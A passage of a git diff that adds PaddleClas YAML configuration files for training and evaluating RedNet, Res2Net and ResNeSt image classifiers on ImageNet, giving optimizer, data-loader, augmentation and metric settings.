./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet152.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet152.yaml new file mode 100644 index 0000000..f44623c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet152.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet152 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet26.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet26.yaml new file mode 100644 index 0000000..c81395b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet26.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet26 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet38.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet38.yaml new file mode 100644 index 0000000..5f40ab3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet38.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet38 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet50.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet50.yaml new file mode 100644 index 0000000..e4169ee --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet50.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net101_vd_26w_4s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net101_vd_26w_4s.yaml new file mode 100644 index 0000000..7e5cbfd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net101_vd_26w_4s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net101_vd_26w_4s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net200_vd_26w_4s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net200_vd_26w_4s.yaml new file mode 100644 index 0000000..edceda1 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net200_vd_26w_4s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net200_vd_26w_4s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_14w_8s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_14w_8s.yaml new file mode 100644 index 0000000..1f3ecde --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_14w_8s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net50_14w_8s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_26w_4s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_26w_4s.yaml new file mode 100644 index 0000000..31ad95e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_26w_4s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net50_26w_4s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_vd_26w_4s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_vd_26w_4s.yaml new file mode 100644 index 0000000..1157ac0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_vd_26w_4s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net50_vd_26w_4s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt101.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt101.yaml new file mode 100644 index 0000000..9daaac2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt101.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeSt101 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50.yaml new file mode 100644 index 0000000..24c82b5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeSt50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 